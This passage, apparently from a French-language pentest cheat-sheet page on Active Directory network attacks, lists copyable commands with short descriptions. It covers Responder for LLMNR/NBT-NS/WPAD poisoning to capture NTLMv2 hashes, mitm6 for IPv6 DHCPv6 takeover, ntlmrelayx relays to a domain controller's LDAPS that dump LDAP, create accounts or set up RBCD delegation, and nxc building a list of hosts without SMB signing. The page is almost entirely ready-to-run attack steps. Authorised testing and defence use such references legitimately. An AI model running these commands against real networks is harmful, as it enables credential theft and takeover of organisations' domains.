Copy command
Responder -I $IFACE -wdFDescription: LLMNR/NBT-NS/WPAD poisoning : capturer les hashes NTLMv2 sur le réseau local.
Pre-Exploitation
Network Attacks Inside AD
IPv6 takeover avec mitm6, LLMNR/NBT-NS poisoning et WPAD abuse.
Copy command
mitm6 -d $DOMAINDescription: IPv6 takeover : répondre aux requêtes DHCPv6 pour devenir DNS et capturer les auths.
Copy command
ntlmrelayx.py -6 -t ldaps://$DC -wh fakewpad.$DOMAIN -l /tmp/lootDescription: Relay mitm6 vers LDAPS du DC : dump LDAP et création de comptes.
Copy command
ntlmrelayx.py -6 -t ldaps://$DC --delegate-access --no-smb-serverDescription: Relay IPv6 avec délégation : créer un compte machine contrôlé pour RBCD.
Copy command
nxc smb $CIDR -u $USER -p $PASS --gen-relay-list relay.txtDescription: Préparer la liste des cibles sans SMB signing avant de lancer le relay.